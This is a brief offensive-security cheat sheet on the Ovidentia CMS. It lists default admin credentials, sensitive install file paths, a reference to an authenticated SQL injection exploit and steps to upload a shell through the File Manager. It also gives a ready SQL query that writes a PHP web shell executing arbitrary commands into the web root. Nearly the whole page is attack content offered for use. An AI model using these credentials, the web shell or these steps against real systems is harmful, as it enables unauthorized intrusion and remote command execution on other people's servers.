ovidentia
Default Creds
# http://chantal.jeannin.free.fr/install/install.txt
admin@admin.bab:012345678Interesting Path
/install/install.txt
/install/babinstall.mysqlSQL injection
v 6.0 Authenticated
https://www.exploit-db.com/exploits/49707File Manager Upload (Authenticated)
once logged in, File Manager (on left) > Add Folder > Upload shell
Shell directly via SQL
select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/wamp/www/php/web.php'Last updated
Was this helpful?